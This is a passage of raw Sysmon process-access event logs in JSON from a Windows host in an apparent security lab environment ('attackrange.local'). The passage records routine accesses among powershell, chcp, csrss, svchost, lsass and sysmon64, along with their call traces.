05:52:42.593","SourceProcessGUID":"{A837DB8D-032A-5F25-0000-001045CE0900}","SourceProcessId":"2776","SourceThreadId":"5084","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-032A-5F25-0000-0010ECD90900}","TargetProcessId":"4188","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+13bf3779(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+13094853(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+13094524(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+13b45939(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+130550ba(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+130b3589(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+13096bee(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+13096bee(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+13096a7f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+13088a04(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+13094f37(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+13094b2a(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+13094853(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+13094524(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+13b45939(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+1307b385(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+1307a955(wow64)","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5106,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.593\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032A-5F25-0000-0010ECD90900}\r\nTargetProcessId: 4188\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.593","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032A-5F25-0000-0010ECD90900}","TargetProcessId":"4188","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5107,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.593\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.593","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5108,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.593\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.593","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5109,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.593\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.593","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5110,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.593\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.593","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5111,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.593\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.593","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5112,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.593\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.593","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5113,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.593\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: 